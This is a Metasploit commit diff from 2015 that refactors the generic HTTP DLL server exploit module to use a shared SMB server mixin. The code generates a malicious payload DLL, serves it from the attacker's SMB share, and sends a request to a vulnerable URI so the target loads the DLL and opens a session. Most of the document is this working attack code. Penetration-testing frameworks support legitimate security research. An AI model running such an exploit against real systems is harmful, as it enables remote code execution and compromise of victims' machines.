Modify SMB generation code to use primer based on rapid7#3074 changes to

Matthew Hall · Matthew Hall · commit 4963992b171e · 2015-02-20T11:31:15.000Z
implement Msf::Exploit::Remote::SMB::Server::Share as a mixin.
diff --git a/modules/exploits/windows/http/generic_http_dll_server.rb b/modules/exploits/windows/http/generic_http_dll_server.rb
@@ -10,7 +10,7 @@
 
 class Metasploit3 < Msf::Exploit::Remote
   include Msf::Exploit::Remote::HttpClient
-  include Msf::Exploit::Remote::SMBFileServer
+  include Msf::Exploit::Remote::SMB::Server::Share
   include Msf::Exploit::EXE
 
   def initialize(info={})
@@ -47,37 +47,20 @@ def initialize(info={})
       ))
       register_options(
         [
-          OptString.new('UNCPATH',  [false, 'Override the UNC path to use an existing SMB Server(Ex: \\\\192.168.1.1\\share\\exploit.dll)' ]),
+          OptString.new('FILE_NAME', [ false, 'DLL File name to share', 'exploit.dll']),
           OptString.new('URI',      [true,  'Path to vulnerable URI (last argument will be the location of the file shared)', '/path/to/vulnerable/function.ext?argument=' ]),
           OptBool.new('StripExt',   [false, 'Boolean to whether I should strip the file extension (e.g. foo.dll => foo)', true]),
         ], self.class)
+      deregister_options('FILE_CONTENTS')
   end
 
-  def start_server 
-    if (datastore['UNCPATH'])
-      @unc = datastore['UNCPATH']
-      print_status("Remember to share the malicious DLL payload as #{@unc}")
-    else
-      print_status("Generating our malicious dll...")
-      exe = generate_payload_dll
-
-      @exe_file = rand_text_alpha(7) + ".dll"
-      @share = rand_text_alpha(5)
-
-      my_host = (datastore['SRVHOST'] == '0.0.0.0') ? Rex::Socket.source_address : datastore['SRVHOST']
-      @unc = "\\\\#{my_host}\\#{@share}\\#{@exe_file}"
-      vprint_status("About to start SMB Server on: " + @unc)
-      # start_smb_server('UNC Path', 'Payload', 'Name of file to be served')
-      start_smb_server(@unc, exe, @exe_file)
-    end
-  end
-
-  def exploit
-    start_server
+  def primer 
+    self.exe_contents = generate_payload_dll
+    print_status("File available on #{unc}...")
     if datastore['StripExt']
-      share = "#{@unc}".gsub(/\.dll/,'')
+      share = "#{unc}".gsub(/\.dll/,'')
     else
-      share = "#{@unc}"
+      share = "#{unc}"
     end
     print_status("Requesting DLL load to #{datastore['RHOST']}:#{datastore['RPORT']} from #{share}")
 
@@ -92,8 +75,7 @@ def exploit
     # Wait 30 seconds for session to be created
     1.upto(30) do
       break if session_created?
-      select(nil, nil, nil, 1)
-      handler
+      sleep(1) 
     end
     disconnect
   end
